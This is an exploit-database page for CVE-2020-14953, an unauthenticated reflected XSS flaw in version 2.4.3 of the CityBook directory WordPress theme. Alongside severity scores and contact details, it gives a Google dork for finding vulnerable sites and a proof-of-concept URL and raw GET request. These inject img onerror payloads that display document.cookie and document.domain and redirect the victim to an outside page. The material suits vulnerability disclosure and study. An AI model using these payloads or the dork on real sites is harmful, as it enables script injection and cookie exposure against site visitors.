Advertisement






CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS

CVE Category Price Severity
CVE-2020-14953 CWE-79 $500 High
Author Risk Exploitation Type Date
Exploitalert Team High Remote 2020-06-22
CPE
cpe:cpe:/a:wordpress:citybook_directory_amp_listing_theme:2.4.3
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060093

Below is a copy:

CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
[+] Exploit Title: CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/citybook/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 2.4.3
[+] Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14953
[+] CWE: CWE-79



### [ PoC: ]

[!] https://citybook2.cththemes.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47

[!] GET /?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47 HTTP/1.1
Host: citybook2.cththemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.